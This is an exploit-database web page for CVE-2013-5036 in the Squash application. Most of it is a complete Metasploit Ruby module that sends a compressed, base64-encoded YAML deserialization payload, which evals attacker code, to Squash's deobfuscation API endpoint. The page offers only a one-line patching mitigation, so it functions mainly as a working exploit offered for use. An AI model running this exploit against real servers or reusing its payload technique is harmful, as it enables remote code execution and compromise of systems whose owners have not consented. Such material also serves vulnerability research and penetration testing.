Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Squash YAML Code Execution - exploit.company
header-logo
Suggest Exploit
vendor:
Squash
by:
Charlie Eriksen
7.5
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Squash
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2013-5036
CPE: a:squash:squash
Metasploit:
Other Scripts:
Platforms Tested:
2013

Squash YAML Code Execution

This module exploits a remote code execution vulnerability in the YAML request processor of the Squash application.

Mitigation:

Update to a version that has patched the vulnerability.
Source

Exploit-DB raw data:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Squash YAML Code Execution',
      'Description'    => %q{
          This module exploits a remote code execution vulnerability in the
        YAML request processor of the Squash application.
      },
      'Author'         =>
        [
          'Charlie Eriksen' # Discovery, initial exploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://ceriksen.com/2013/08/06/squash-remote-code-execution-vulnerability-advisory/'],
          [ 'OSVDB', '95992'],
          [ 'CVE', '2013-5036']
        ],
      'Platform'       => 'ruby',
      'Arch'           => ARCH_RUBY,
      'Privileged'     => false,
      'Targets'        =>  [ ['Automatic', {} ] ],
      'DisclosureDate' => 'Aug 06 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"])
      ], self.class)

  end

  def check
    response = send_request_cgi({
        'uri'     => normalize_uri(target_uri.path, "api", "1.0", "deobfuscation"),
        'method'  => 'POST',
        'ctype'   => 'application/json',
      })

    if response.code == 422
      print_status("Got HTTP 422 result, target may be vulnerable")
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    code = Rex::Text.encode_base64(payload.encoded)
    yaml =  "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
        "'#{rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
        ": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
    payload = Rex::Text.encode_base64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
    data = "{\"api_key\":\"1\",\"environment\":\"production\",\"build\":\"1\",\"namespace\":\"#{payload}\"}"

    send_request_cgi({
      'uri'     => normalize_uri(target_uri.path, "api", "1.0", "deobfuscation"),
      'method'  => 'POST',
      'ctype'   => 'application/json',
      'data'    => data
    })
  end
end

Navigation

Suggest Exploit

Services By CQR